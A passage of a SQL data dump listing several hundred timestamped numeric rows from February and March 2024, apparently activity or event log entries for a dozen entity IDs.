(9890, '2024-02-21 12:31:49', 1, 2061, 0, 1, 1),
(9891, '2024-02-21 12:32:07', 1, 2061, 0, 1, 1),
(9892, '2024-02-21 13:15:02', 1, 2053, 0, 1, 1),
(9893, '2024-02-21 17:25:53', 1, 2064, 0, 1, 1),
(9894, '2024-02-21 19:20:44', 1, 2060, 0, 1, 1),
(9895, '2024-02-21 19:24:52', 1, 2060, 0, 1, 1),
(9896, '2024-02-21 20:08:05', 1, 2060, 0, 1, 1),
(9897, '2024-02-21 21:29:32', 1, 2062, 0, 1, 1),
(9898, '2024-02-22 01:15:27', 1, 2053, 0, 1, 1),
(9899, '2024-02-22 03:33:59', 1, 2059, 0, 1, 1),
(9900, '2024-02-22 04:49:20', 1, 2064, 0, 1, 1),
(9901, '2024-02-22 05:29:21', 1, 2062, 0, 1, 1),
(9902, '2024-02-22 08:38:19', 1, 2054, 0, 1, 1),
(9903, '2024-02-22 13:17:04', 1, 2053, 0, 1, 1),
(9904, '2024-02-22 16:30:23', 1, 2064, 0, 1, 1),
(9905, '2024-02-22 21:57:38', 1, 2058, 0, 1, 1),
(9906, '2024-02-22 22:27:56', 1, 2054, 0, 1, 1),
(9907, '2024-02-23 05:21:18', 1, 2053, 0, 1, 1),
(9908, '2024-02-23 06:26:49', 1, 2054, 0, 1, 1),
(9909, '2024-02-23 08:55:48', 1, 2062, 0, 1, 1),
(9910, '2024-02-23 08:56:35', 1, 2062, 0, 1, 1),
(9911, '2024-02-23 13:10:39', 1, 2063, 0, 1, 1),
(9912, '2024-02-23 13:10:53', 1, 2061, 0, 1, 1),
(9913, '2024-02-23 13:11:01', 1, 2055, 0, 1, 1),
(9914, '2024-02-23 13:11:15', 1, 2064, 0, 1, 1),
(9915, '2024-02-23 13:11:27', 1, 2060, 0, 1, 1),
(9916, '2024-02-23 13:11:39', 1, 2059, 0, 1, 1),
(9917, '2024-02-23 13:11:53', 1, 2058, 0, 1, 1),
(9918, '2024-02-23 13:13:52', 1, 2062, 0, 1, 1),
(9919, '2024-02-23 13:14:02', 1, 2054, 0, 1, 1),
(9920, '2024-02-23 13:26:52', 1, 2053, 0, 1, 1),
(9921, '2024-02-23 13:27:03', 1, 2063, 0, 1, 1),
(9922, '2024-02-23 13:27:14', 1, 2062, 0, 1, 1),
(9923, '2024-02-23 13:27:51', 1, 2055, 0, 1, 1),
(9924, '2024-02-23 13:27:58', 1, 2060, 0, 1, 1),
(9925, '2024-02-23 13:28:05', 1, 2064, 0, 1, 1),
(9926, '2024-02-23 13:31:39', 1, 2061, 0, 1, 1),
(9927, '2024-02-23 13:32:10', 1, 2054, 0, 1, 1),
(9928, '2024-02-23 13:32:32', 1, 2059, 0, 1, 1),
(9929, '2024-02-23 13:32:41', 1, 2058, 0, 1, 1),
(9930, '2024-02-23 13:33:53', 1, 2055, 0, 1, 1),
(9931, '2024-02-23 15:22:52', 1, 2054, 0, 1, 1),
(9932, '2024-02-23 16:07:21', 1, 2062, 0, 1, 1),
(9933, '2024-02-23 18:34:58', 1, 2054, 0, 1, 1),
(9934, '2024-02-23 18:39:32', 1, 2063, 0, 1, 1),
(9935, '2024-02-23 18:44:06', 1, 2054, 0, 1, 1),
(9936, '2024-02-23 19:26:29', 1, 2064, 0, 1, 1),
(9937, '2024-02-23 19:28:13', 1, 2053, 0, 1, 1),
(9938, '2024-02-23 20:41:24', 1, 2060, 0, 1, 1),
(9939, '2024-02-23 20:52:59', 1, 2063, 0, 1, 1),
(9940, '2024-02-23 21:26:24', 1, 2058, 0, 1, 1),
(9941, '2024-02-23 21:32:16', 1, 2055, 0, 1, 1),
(9942, '2024-02-23 22:23:32', 1, 2055, 0, 1, 1),
(9943, '2024-02-23 23:01:00', 1, 2064, 0, 1, 1),
(9944, '2024-02-23 23:49:24', 1, 2061, 0, 1, 1),
(9945, '2024-02-24 00:25:25', 1, 2063, 0, 1, 1),
(9946, '2024-02-24 00:31:22', 1, 2062, 0, 1, 1),
(9947, '2024-02-24 02:09:48', 1, 2060, 0, 1, 1),
(9948, '2024-02-24 02:21:58', 1, 2063, 0, 1, 1),
(9949, '2024-02-24 02:56:52', 1, 2058, 0, 1, 1),
(9950, '2024-02-24 03:56:45', 1, 2055, 0, 1, 1),
(9951, '2024-02-24 05:27:20', 1, 2061, 0, 1, 1),
(9952, '2024-02-24 05:32:20', 1, 2061, 0, 1, 1),
(9953, '2024-02-24 05:33:07', 1, 2061, 0, 1, 1),
(9954, '2024-02-24 06:11:23', 1, 2062, 0, 1, 1),
(9955, '2024-02-24 07:21:56', 1, 2054, 0, 1, 1),
(9956, '2024-02-24 07:36:41', 1, 2053, 0, 1, 1),
(9957, '2024-02-24 07:47:12', 1, 2054, 0, 1, 1),
(9958, '2024-02-24 08:10:10', 1, 2059, 0, 1, 1),
(9959, '2024-02-24 08:29:31', 1, 2064, 0, 1, 1),
(9960, '2024-02-24 12:21:25', 1, 2061, 0, 1, 1),
(9961, '2024-02-24 12:21:47', 1, 2061, 0, 1, 1),
(9962, '2024-02-24 14:24:46', 1, 2062, 0, 1, 1),
(9963, '2024-02-24 15:39:46', 1, 2054, 0, 1, 1),
(9964, '2024-02-24 16:01:36', 1, 2061, 0, 1, 1),
(9965, '2024-02-24 17:34:59', 1, 2053, 0, 1, 1),
(9966, '2024-02-25 01:43:52', 1, 2061, 0, 1, 1),
(9967, '2024-02-25 02:00:53', 1, 2054, 0, 1, 1),
(9968, '2024-02-25 02:18:00', 1, 2064, 0, 1, 1),
(9969, '2024-02-25 04:17:46', 1, 2061, 0, 1, 1),
(9970, '2024-02-25 04:27:40', 1, 2054, 0, 1, 1),
(9971, '2024-02-25 07:03:19', 1, 2053, 0, 1, 1),
(9972, '2024-02-25 12:23:31', 1, 2063, 0, 1, 1),
(9973, '2024-02-25 12:23:46', 1, 2063, 0, 1, 1),
(9974, '2024-02-25 15:48:30', 1, 2054, 0, 1, 1),
(9975, '2024-02-25 20:24:28', 1, 2053, 0, 1, 1),
(9976, '2024-02-25 22:52:58', 1, 2059, 0, 1, 1),
(9977, '2024-02-26 02:50:10', 1, 2064, 0, 1, 1),
(9978, '2024-02-26 03:01:11', 1, 2064, 0, 1, 1),
(9979, '2024-02-26 04:16:26', 1, 2053, 0, 1, 1),
(9980, '2024-02-26 04:30:25', 1, 2054, 0, 1, 1),
(9981, '2024-02-26 09:04:40', 1, 2059, 0, 1, 1),
(9982, '2024-02-26 09:35:36', 1, 2053, 0, 1, 1),
(9983, '2024-02-26 14:28:39', 1, 2060, 0, 1, 1),
(9984, '2024-02-26 16:18:19', 1, 2054, 0, 1, 1),
(9985, '2024-02-26 22:14:21', 1, 2054, 0, 1, 1),
(9986, '2024-02-27 02:30:45', 1, 2062, 0, 1, 1),
(9987, '2024-02-27 02:45:13', 1, 2058, 0, 1, 1),
(9988, '2024-02-27 04:10:45', 1, 2054, 0, 1, 1),
(9989, '2024-02-27 17:03:32', 1, 2061, 0, 1, 1),
(9990, '2024-02-27 19:16:07', 1, 2054, 0, 1, 1),
(9991, '2024-02-27 19:28:54', 1, 2064, 0, 1, 1),
(9992, '2024-02-27 21:06:31', 1, 2064, 0, 1, 1),
(9993, '2024-02-27 21:06:31', 1, 2061, 0, 1, 1),
(9994, '2024-02-27 21:06:31', 1, 2063, 0, 1, 1),
(9995, '2024-02-27 21:06:32', 1, 2055, 0, 1, 1),
(9996, '2024-02-27 21:06:33', 1, 2060, 0, 1, 1),
(9997, '2024-02-27 21:06:33', 1, 2059, 0, 1, 1),
(9998, '2024-02-27 21:06:35', 1, 2058, 0, 1, 1),
(9999, '2024-02-27 21:06:39', 1, 2062, 0, 1, 1),
(10000, '2024-02-27 21:06:41', 1, 2054, 0, 1, 1),
(10001, '2024-02-28 03:38:22', 1, 2054, 0, 1, 1),
(10002, '2024-02-28 04:29:23', 4, 2061, 2057, 1, 1),
(10003, '2024-02-28 09:27:15', 1, 2053, 0, 1, 1),
(10004, '2024-02-28 14:19:49', 1, 2054, 0, 1, 1),
(10005, '2024-02-28 15:39:59', 1, 2058, 0, 1, 1),
(10006, '2024-02-28 17:34:40', 1, 2062, 0, 1, 1),
(10007, '2024-02-28 18:14:41', 1, 2055, 0, 1, 1),
(10008, '2024-02-28 20:56:00', 1, 2064, 0, 1, 1),
(10009, '2024-02-28 23:15:12', 1, 2061, 0, 1, 1),
(10010, '2024-02-29 01:43:13', 1, 2061, 0, 1, 1),
(10011, '2024-02-29 02:04:21', 1, 2058, 0, 1, 1),
(10012, '2024-02-29 02:26:44', 1, 2061, 0, 1, 1),
(10013, '2024-02-29 02:26:46', 1, 2061, 0, 1, 1),
(10014, '2024-02-29 02:44:44', 1, 2053, 0, 1, 1),
(10015, '2024-02-29 03:58:57', 1, 2054, 0, 1, 1),
(10016, '2024-02-29 04:55:37', 1, 2054, 0, 1, 1),
(10017, '2024-02-29 04:59:47', 1, 2064, 0, 1, 1),
(10018, '2024-02-29 10:43:32', 1, 2064, 0, 1, 1),
(10019, '2024-02-29 12:30:47', 1, 2061, 0, 1, 1),
(10020, '2024-02-29 13:13:30', 1, 2060, 0, 1, 1),
(10021, '2024-02-29 13:15:15', 1, 2053, 0, 1, 1),
(10022, '2024-02-29 16:02:26', 1, 2054, 0, 1, 1),
(10023, '2024-02-29 20:08:21', 1, 2064, 0, 1, 1),
(10024, '2024-03-01 01:34:08', 1, 2053, 0, 1, 1),
(10025, '2024-03-01 01:38:16', 1, 2054, 0, 1, 1),
(10026, '2024-03-01 01:53:03', 1, 2061, 0, 1, 1),
(10027, '2024-03-01 04:41:56', 1, 2061, 0, 1, 1),
(10028, '2024-03-01 04:55:02', 1, 2064, 0, 1, 1),
(10029, '2024-03-01 09:26:20', 1, 2055, 0, 1, 1),
(10030, '2024-03-01 09:26:24', 1, 2064, 0, 1, 1),
(10031, '2024-03-01 09:26:27', 1, 2063, 0, 1, 1),
(10032, '2024-03-01 09:26:31', 1, 2062, 0, 1, 1),
(10033, '2024-03-01 09:26:35', 1, 2060, 0, 1, 1),
(10034, '2024-03-01 13:08:51', 1, 2053, 0, 1, 1),
(10035, '2024-03-01 15:15:36', 1, 2062, 0, 1, 1),
(10036, '2024-03-01 15:22:08', 1, 2064, 0, 1, 1),
(10037, '2024-03-01 23:32:09', 1, 2060, 0, 1, 1),
(10038, '2024-03-02 00:23:04', 1, 2063, 0, 1, 1),
(10039, '2024-03-02 01:44:15', 1, 2054, 0, 1, 1),
(10040, '2024-03-02 02:30:03', 1, 2064, 0, 1, 1),
(10041, '2024-03-02 10:06:23', 1, 2062, 0, 1, 1),
(10042, '2024-03-02 13:12:21', 1, 2064, 0, 1, 1),
(10043, '2024-03-02 13:43:02', 1, 2054, 0, 1, 1),
(10044, '2024-03-02 13:43:14', 1, 2055, 0, 1, 1),
(10045, '2024-03-02 13:44:31', 1, 2058, 0, 1, 1),
(10046, '2024-03-02 13:44:47', 1, 2061, 0, 1, 1),
(10047, '2024-03-02 13:45:07', 1, 2060, 0, 1, 1),
(10048, '2024-03-02 13:45:21', 1, 2059, 0, 1, 1),
(10049, '2024-03-02 13:45:39', 1, 2063, 0, 1, 1),
(10050, '2024-03-02 13:46:25', 1, 2062, 0, 1, 1),
(10051, '2024-03-02 13:46:54', 1, 2064, 0, 1, 1),
(10052, '2024-03-02 13:55:55', 1, 2053, 0, 1, 1),
(10053, '2024-03-02 15:58:21', 1, 2053, 0, 1, 1),
(10054, '2024-03-02 21:26:37', 1, 2054, 0, 1, 1),
(10055, '2024-03-02 21:45:06', 1, 2054, 0, 1, 1),
(10056, '2024-03-02 23:20:19', 1, 2053, 0, 1, 1),
(10057, '2024-03-03 01:55:36', 1, 2064, 0, 1, 1),
(10058, '2024-03-03 02:42:42', 1, 2055, 0, 1, 1),
(10059, '2024-03-03 07:14:17', 1, 2053, 0, 1, 1),
(10060, '2024-03-03 07:51:19', 1, 2054, 0, 1, 1),
(10061, '2024-03-03 08:05:44', 1, 2060, 0, 1, 1),
(10062, '2024-03-03 08:15:11', 1, 2063, 0, 1, 1),
(10063, '2024-03-03 08:38:13', 1, 2058, 0, 1, 1),
(10064, '2024-03-03 09:05:48', 1, 2061, 0, 1, 1),
(10065, '2024-03-03 09:27:58', 1, 2055, 0, 1, 1),
(10066, '2024-03-03 10:31:41', 1, 2064, 0, 1, 1),
(10067, '2024-03-03 10:31:44', 1, 2064, 0, 1, 1),
(10068, '2024-03-03 11:00:13', 1, 2061, 0, 1, 1),
(10069, '2024-03-03 11:48:39', 1, 2062, 0, 1, 1),
(10070, '2024-03-03 11:58:58', 1, 2055, 0, 1, 1),
(10071, '2024-03-03 12:27:35', 1, 2063, 0, 1, 1),
(10072, '2024-03-03 12:27:35', 1, 2062, 0, 1, 1),
(10073, '2024-03-03 12:27:36', 1, 2061, 0, 1, 1),
(10074, '2024-03-03 12:27:37', 1, 2060, 0, 1, 1),
(10075, '2024-03-03 12:27:37', 1, 2054, 0, 1, 1),
(10076, '2024-03-03 12:27:37', 1, 2059, 0, 1, 1),
(10077, '2024-03-03 12:27:43', 1, 2055, 0, 1, 1),
(10078, '2024-03-03 12:27:48', 1, 2064, 0, 1, 1),
(10079, '2024-03-03 12:27:49', 1, 2058, 0, 1, 1),
(10080, '2024-03-03 13:18:56', 1, 2054, 0, 1, 1),
(10081, '2024-03-03 13:38:40', 1, 2059, 0, 1, 1),
(10082, '2024-03-03 13:54:34', 1, 2064, 0, 1, 1),
(10083, '2024-03-03 15:00:18', 1, 2053, 0, 1, 1),
(10084, '2024-03-03 15:28:16', 1, 2054, 0, 1, 1),
(10085, '2024-03-03 19:13:40', 1, 2064, 0, 1, 1),
(10086, '2024-03-04 01:07:20', 1, 2054, 0, 1, 1),
(10087, '2024-03-04 01:47:48', 1, 2062, 0, 1, 1),
(10088, '2024-03-04 01:53:43', 1, 2053, 0, 1, 1),
(10089, '2024-03-04 03:01:33', 1, 2064, 0, 1, 1),
(10090, '2024-03-04 13:29:10', 1, 2053, 0, 1, 1),
(10091, '2024-03-04 13:39:44', 1, 2064, 0, 1, 1),
(10092, '2024-03-04 15:20:44', 1, 2064, 0, 1, 1),
(10093, '2024-03-04 17:41:16', 1, 2054, 0, 1, 1),
(10094, '2024-03-04 20:34:15', 1, 2064, 0, 1, 1),
(10095, '2024-03-05 01:00:10', 1, 2063, 0, 1, 1),
(10096, '2024-03-05 01:47:32', 1, 2063, 0, 1, 1),
(10097, '2024-03-05 01:47:41', 1, 2063, 0, 1, 1),
(10098, '2024-03-05 02:01:53', 1, 2059, 0, 1, 1),
(10099, '2024-03-05 09:06:10', 1, 2063, 0, 1, 1),
(10100, '2024-03-05 09:37:18', 1, 2053, 0, 1, 1),
(10101, '2024-03-05 12:06:03', 1, 2054, 0, 1, 1),
(10102, '2024-03-05 13:38:16', 1, 2061, 0, 1, 1),
(10103, '2024-03-05 15:14:46', 1, 2063, 0, 1, 1),
(10104, '2024-03-05 17:29:40', 1, 2053, 0, 1, 1),
(10105, '2024-03-05 21:01:18', 1, 2064, 0, 1, 1),
(10106, '2024-03-05 21:01:59', 1, 2062, 0, 1, 1),
(10107, '2024-03-05 21:02:17', 1, 2053, 0, 1, 1),
(10108, '2024-03-05 21:03:50', 1, 2063, 0, 1, 1),
(10109, '2024-03-05 21:03:53', 1, 2061, 0, 1, 1),
(10110, '2024-03-05 21:04:01', 1, 2059, 0, 1, 1),
(10111, '2024-03-05 21:04:06', 1, 2058, 0, 1, 1),
(10112, '2024-03-05 21:05:21', 1, 2055, 0, 1, 1),
(10113, '2024-03-05 21:05:29', 1, 2054, 0, 1, 1),
(10114, '2024-03-05 21:09:01', 1, 2060, 0, 1, 1),
(10115, '2024-03-05 21:16:02', 1, 2053, 0, 1, 1),
(10116, '2024-03-05 22:17:10', 1, 2058, 0, 1, 1),
(10117, '2024-03-05 23:23:33', 1, 2054, 0, 1, 1),
(10118, '2024-03-05 23:33:18', 1, 2054, 0, 1, 1),
(10119, '2024-03-05 23:37:05', 1, 2063, 0, 1, 1),
(10120, '2024-03-05 23:37:09', 1, 2059, 0, 1, 1),
(10121, '2024-03-06 01:18:51', 1, 2058, 0, 1, 1),
(10122, '2024-03-06 01:29:00', 1, 2058, 0, 1, 1),
(10123, '2024-03-06 03:45:12', 1, 2060, 0, 1, 1),
(10124, '2024-03-06 07:37:57', 1, 2054, 0, 1, 1),
(10125, '2024-03-06 16:35:59', 1, 2059, 0, 1, 1),
(10126, '2024-03-06 16:37:28', 1, 2053, 0, 1, 1),
(10127, '2024-03-06 23:31:10', 1, 2054, 0, 1, 1),
(10128, '2024-03-07 02:11:10', 1, 2059, 0, 1, 1),
(10129, '2024-03-07 06:46:34', 1, 2058, 0, 1, 1),
(10130, '2024-03-07 09:14:10', 1, 2054, 0, 1, 1),
(10131, '2024-03-07 13:18:13', 1, 2063, 0, 1, 1),
(10132, '2024-03-07 13:47:44', 1, 2064, 0, 1, 1),
(10133, '2024-03-07 14:09:17', 1, 2061, 0, 1, 1),
(10134, '2024-03-07 17:05:58', 1, 2054, 0, 1, 1),
(10135, '2024-03-07 19:06:02', 1, 2063, 0, 1, 1),
(10136, '2024-03-08 02:12:01', 1, 2063, 0, 1, 1),
(10137, '2024-03-08 02:28:32', 1, 2055, 0, 1, 1),
(10138, '2024-03-08 02:37:30', 1, 2064, 0, 1, 1),
(10139, '2024-03-08 03:52:02', 1, 2061, 0, 1, 1),
(10140, '2024-03-08 03:52:29', 1, 2064, 0, 1, 1),
(10141, '2024-03-08 05:05:59', 1, 2054, 0, 1, 1),
(10142, '2024-03-08 09:36:25', 1, 2061, 0, 1, 1),
(10143, '2024-03-08 13:00:38', 1, 2054, 0, 1, 1),
(10144, '2024-03-08 14:07:12', 1, 2064, 0, 1, 1),
(10145, '2024-03-08 14:45:02', 1, 2054, 0, 1, 1),
(10146, '2024-03-08 18:56:29', 1, 2064, 0, 1, 1),
(10147, '2024-03-08 20:32:09', 1, 2055, 0, 1, 1),
(10148, '2024-03-08 20:54:57', 1, 2053, 0, 1, 1),
(10149, '2024-03-08 21:21:56', 1, 2054, 0, 1, 1),
(10150, '2024-03-08 22:24:05', 1, 2062, 0, 1, 1),
(10151, '2024-03-08 22:25:23', 1, 2062, 0, 1, 1),
(10152, '2024-03-09 02:43:51', 1, 2060, 0, 1, 1),
(10153, '2024-03-09 04:14:32', 1, 2061, 0, 1, 1),
(10154, '2024-03-09 04:31:57', 1, 2054, 0, 1, 1),
(10155, '2024-03-09 08:03:44', 1, 2063, 0, 1, 1),
(10156, '2024-03-09 12:40:38', 1, 2064, 0, 1, 1),
(10157, '2024-03-09 12:59:08', 1, 2055, 0, 1, 1),
(10158, '2024-03-09 13:06:43', 1, 2053, 0, 1, 1),
(10159, '2024-03-09 16:15:03', 1, 2054, 0, 1, 1),
(10160, '2024-03-09 20:14:06', 1, 2060, 0, 1, 1),
(10161, '2024-03-09 20:14:09', 1, 2055, 0, 1, 1),
(10162, '2024-03-09 20:14:27', 1, 2059, 0, 1, 1),
(10163, '2024-03-09 20:14:31', 1, 2058, 0, 1, 1),
(10164, '2024-03-09 20:14:40', 1, 2054, 0, 1, 1),
(10165, '2024-03-09 20:14:49', 1, 2064, 0, 1, 1),
(10166, '2024-03-09 20:14:56', 1, 2063, 0, 1, 1),
(10167, '2024-03-09 20:15:00', 1, 2062, 0, 1, 1),
(10168, '2024-03-09 20:15:05', 1, 2061, 0, 1, 1),
(10169, '2024-03-10 00:55:58', 1, 2054, 0, 1, 1),
(10170, '2024-03-10 02:25:53', 1, 2062, 0, 1, 1),
(10171, '2024-03-10 05:18:45', 1, 2064, 0, 1, 1),
(10172, '2024-03-10 05:24:18', 1, 2058, 0, 1, 1),
(10173, '2024-03-10 06:08:39', 1, 2053, 0, 1, 1),
(10174, '2024-03-10 06:26:02', 1, 2059, 0, 1, 1),
(10175, '2024-03-10 13:05:52', 1, 2053, 0, 1, 1),
(10176, '2024-03-10 14:12:27', 1, 2054, 0, 1, 1),
(10177, '2024-03-10 14:15:11', 1, 2064, 0, 1, 1),
(10178, '2024-03-10 14:58:44', 1, 2062, 0, 1, 1),
(10179, '2024-03-10 15:05:09', 1, 2060, 0, 1, 1),
(10180, '2024-03-10 17:05:32', 1, 2064, 0, 1, 1),
(10181, '2024-03-11 01:08:57', 1, 2061, 0, 1, 1),
(10182, '2024-03-11 01:10:24', 1, 2061, 0, 1, 1),
(10183, '2024-03-11 01:14:00', 1, 2061, 0, 1, 1),
(10184, '2024-03-11 01:56:56', 1, 2061, 0, 1, 1),
(10185, '2024-03-11 05:38:24', 1, 2064, 0, 1, 1),
(10186, '2024-03-11 07:01:12', 1, 2053, 0, 1, 1),
(10187, '2024-03-11 09:19:29', 1, 2054, 0, 1, 1),
(10188, '2024-03-11 15:19:43', 1, 2061, 0, 1, 1),
(10189, '2024-03-11 16:09:01', 1, 2053, 0, 1, 1),
(10190, '2024-03-11 17:26:30', 1, 2064, 0, 1, 1),
(10191, '2024-03-11 18:25:31', 1, 2062, 0, 1, 1),
(10192, '2024-03-12 02:21:38', 1, 2064, 0, 1, 1),
(10193, '2024-03-12 02:43:04', 1, 2063, 0, 1, 1),
(10194, '2024-03-12 03:10:52', 1, 2058, 0, 1, 1),
(10195, '2024-03-12 05:13:42', 1, 2061, 0, 1, 1),
(10196, '2024-03-12 07:10:49', 1, 2061, 0, 1, 1),
(10197, '2024-03-12 07:41:26', 1, 2053, 0, 1, 1),
(10198, '2024-03-12 11:28:59', 1, 2054, 0, 1, 1),
(10199, '2024-03-12 12:55:57', 1, 2064, 0, 1, 1),
(10200, '2024-03-12 15:52:06', 1, 2064, 0, 1, 1),
(10201, '2024-03-12 19:02:36', 1, 2063, 0, 1, 1),
(10202, '2024-03-12 20:54:35', 1, 2060, 0, 1, 1),
(10203, '2024-03-12 21:02:03', 1, 2063, 0, 1, 1),
(10204, '2024-03-12 21:36:52', 1, 2058, 0, 1, 1),
(10205, '2024-03-12 21:58:33', 1, 2055, 0, 1, 1),
(10206, '2024-03-12 23:15:43', 1, 2060, 0, 1, 1),
(10207, '2024-03-12 23:24:45', 1, 2063, 0, 1, 1),
(10208, '2024-03-12 23:44:40', 1, 2058, 0, 1, 1),
(10209, '2024-03-13 00:05:25', 1, 2063, 0, 1, 1),
(10210, '2024-03-13 00:37:51', 1, 2058, 0, 1, 1),
(10211, '2024-03-13 00:43:34', 1, 2060, 0, 1, 1),
(10212, '2024-03-13 00:50:51', 1, 2063, 0, 1, 1),
(10213, '2024-03-13 01:08:40', 1, 2058, 0, 1, 1),
(10214, '2024-03-13 01:44:52', 1, 2055, 0, 1, 1),
(10215, '2024-03-13 02:14:00', 1, 2063, 0, 1, 1),
(10216, '2024-03-13 02:51:08', 1, 2061, 0, 1, 1),
(10217, '2024-03-13 03:28:07', 1, 2062, 0, 1, 1),
(10218, '2024-03-13 04:38:44', 1, 2054, 0, 1, 1),
(10219, '2024-03-13 04:53:39', 1, 2059, 0, 1, 1),
(10220, '2024-03-13 05:05:32', 1, 2064, 0, 1, 1),
(10221, '2024-03-13 05:28:17', 1, 2061, 0, 1, 1),
(10222, '2024-03-13 05:28:52', 1, 2063, 0, 1, 1),
(10223, '2024-03-13 10:28:07', 1, 2060, 0, 1, 1),
(10224, '2024-03-13 10:36:02', 1, 2063, 0, 1, 1),
(10225, '2024-03-13 10:43:35', 1, 2059, 0, 1, 1),
(10226, '2024-03-13 10:54:54', 1, 2058, 0, 1, 1),
(10227, '2024-03-13 11:33:16', 1, 2055, 0, 1, 1),
(10228, '2024-03-13 12:42:49', 1, 2061, 0, 1, 1),
(10229, '2024-03-13 13:20:59', 1, 2062, 0, 1, 1),
(10230, '2024-03-13 14:30:44', 1, 2054, 0, 1, 1),
(10231, '2024-03-13 14:44:26', 1, 2059, 0, 1, 1),
(10232, '2024-03-13 14:55:05', 1, 2064, 0, 1, 1),
(10233, '2024-03-13 19:57:41', 1, 2054, 0, 1, 1),
(10234, '2024-03-13 22:37:22', 1, 2058, 0, 1, 1),
(10235, '2024-03-14 06:32:13', 1, 2064, 0, 1, 1),
(10236, '2024-03-14 08:22:17', 1, 2053, 0, 1, 1),
(10237, '2024-03-14 09:38:47', 1, 2061, 0, 1, 1),
(10238, '2024-03-14 10:42:02', 1, 2054, 0, 1, 1),
(10239, '2024-03-14 10:42:48', 1, 2059, 0, 1, 1),
(10240, '2024-03-14 12:47:30', 1, 2058, 0, 1, 1),
(10241, '2024-03-14 20:46:25', 1, 2054, 0, 1, 1),
(10242, '2024-03-15 01:59:19', 1, 2064, 0, 1, 1),
(10243, '2024-03-15 02:54:48', 1, 2061, 0, 1, 1),
(10244, '2024-03-15 07:45:27', 1, 2054, 0, 1, 1),
(10245, '2024-03-15 08:25:46', 1, 2063, 0, 1, 1),
(10246, '2024-03-15 10:59:45', 1, 2054, 0, 1, 1),
(10247, '2024-03-15 13:31:16', 1, 2053, 0, 1, 1),
(10248, '2024-03-15 16:00:04', 1, 2061, 0, 1, 1),
(10249, '2024-03-15 16:01:31', 1, 2054, 0, 1, 1),
(10250, '2024-03-15 17:16:53', 1, 2061, 0, 1, 1),
(10251, '2024-03-15 17:55:19', 1, 2064, 0, 1, 1),
(10252, '2024-03-15 18:07:53', 1, 2055, 0, 1, 1),
(10253, '2024-03-16 07:21:59', 1, 2059, 0, 1, 1),
(10254, '2024-03-16 07:22:01', 1, 2059, 0, 1, 1),
(10255, '2024-03-16 07:22:02', 1, 2059, 0, 1, 1),
(10256, '2024-03-16 08:46:51', 1, 2064, 0, 1, 1),
(10257, '2024-03-16 09:48:03', 1, 2053, 0, 1, 1),
(10258, '2024-03-16 09:48:27', 1, 2053, 0, 1, 1),
(10259, '2024-03-16 12:16:37', 1, 2061, 0, 1, 1),
(10260, '2024-03-16 12:25:58', 1, 2063, 0, 1, 1),
(10261, '2024-03-16 13:46:42', 1, 2054, 0, 1, 1),
(10262, '2024-03-16 14:46:42', 1, 2059, 0, 1, 1),
(10263, '2024-03-16 16:17:40', 1, 2064, 0, 1, 1),
(10264, '2024-03-16 18:17:02', 1, 2064, 0, 1, 1),
(10265, '2024-03-16 21:46:54', 1, 2054, 0, 1, 1),
(10266, '2024-03-16 23:44:29', 1, 2062, 0, 1, 1),
(10267, '2024-03-17 05:47:03', 1, 2054, 0, 1, 1),
(10268, '2024-03-17 06:08:01', 1, 2059, 0, 1, 1),
(10269, '2024-03-17 06:10:12', 1, 2064, 0, 1, 1),
(10270, '2024-03-17 11:25:43', 1, 2061, 0, 1, 1),
(10271, '2024-03-17 11:44:23', 1, 2064, 0, 1, 1),
(10272, '2024-03-17 11:44:25', 1, 2054, 0, 1, 1),
(10273, '2024-03-17 11:44:25', 1, 2060, 0, 1, 1),
(10274, '2024-03-17 11:44:25', 1, 2055, 0, 1, 1),
(10275, '2024-03-17 11:44:27', 1, 2058, 0, 1, 1),
(10276, '2024-03-17 11:44:27', 1, 2062, 0, 1, 1),
(10277, '2024-03-17 11:44:28', 1, 2059, 0, 1, 1),
(10278, '2024-03-17 11:44:28', 1, 2063, 0, 1, 1),
(10279, '2024-03-17 11:44:28', 1, 2061, 0, 1, 1),
(10280, '2024-03-17 12:14:15', 1, 2053, 0, 1, 1),
(10281, '2024-03-17 12:25:59', 1, 2063, 0, 1, 1),
(10282, '2024-03-17 15:50:18', 1, 2063, 0, 1, 1),
(10283, '2024-03-17 15:51:23', 1, 2058, 0, 1, 1),
(10284, '2024-03-17 19:46:52', 1, 2054, 0, 1, 1),
(10285, '2024-03-17 19:52:03', 1, 2063, 0, 1, 1),
(10286, '2024-03-17 19:52:33', 1, 2063, 0, 1, 1),
(10287, '2024-03-17 21:24:45', 1, 2064, 0, 1, 1),
(10288, '2024-03-17 22:17:30', 1, 2064, 0, 1, 1),
(10289, '2024-03-18 00:18:28', 1, 2054, 0, 1, 1),
(10290, '2024-03-18 04:16:52', 1, 2058, 0, 1, 1),
(10291, '2024-03-18 04:17:04', 1, 2062, 0, 1, 1),
(10292, '2024-03-18 05:01:50', 1, 2062, 0, 1, 1),
(10293, '2024-03-18 05:07:06', 1, 2054, 0, 1, 1),
(10294, '2024-03-18 08:08:38', 1, 2064, 0, 1, 1),
(10295, '2024-03-18 09:34:03', 1, 2059, 0, 1, 1),
(10296, '2024-03-18 10:43:27', 1, 2058, 0, 1, 1),
(10297, '2024-03-18 19:02:06', 1, 2058, 0, 1, 1),
(10298, '2024-03-18 21:00:10', 1, 2059, 0, 1, 1),
(10299, '2024-03-19 04:56:38', 1, 2061, 0, 1, 1),
(10300, '2024-03-19 06:21:22', 1, 2064, 0, 1, 1),
(10301, '2024-03-19 06:21:26', 1, 2063, 0, 1, 1),
(10302, '2024-03-19 06:21:27', 1, 2054, 0, 1, 1),
(10303, '2024-03-19 06:21:29', 1, 2059, 0, 1, 1),
(10304, '2024-03-19 06:21:37', 1, 2055, 0, 1, 1),
(10305, '2024-03-19 06:21:38', 1, 2060, 0, 1, 1),
(10306, '2024-03-19 06:21:39', 1, 2061, 0, 1, 1),
(10307, '2024-03-19 06:21:40', 1, 2062, 0, 1, 1),
(10308, '2024-03-19 06:21:41', 1, 2058, 0, 1, 1),
(10309, '2024-03-19 08:08:38', 1, 2064, 0, 1, 1),
(10310, '2024-03-19 16:23:39', 1, 2061, 0, 1, 1),
(10311, '2024-03-19 22:14:01', 1, 2059, 0, 1, 1),
(10312, '2024-03-19 23:46:50', 1, 2061, 0, 1, 1),
(10313, '2024-03-19 23:46:53', 1, 2061, 0, 1, 1),
(10314, '2024-03-20 02:05:39', 1, 2054, 0, 1, 1),
(10315, '2024-03-20 03:19:12', 1, 2060, 0, 1, 1),
(10316, '2024-03-20 05:03:28', 1, 2062, 0, 1, 1),
(10317, '2024-03-20 06:41:33', 1, 2059, 0, 1, 1),
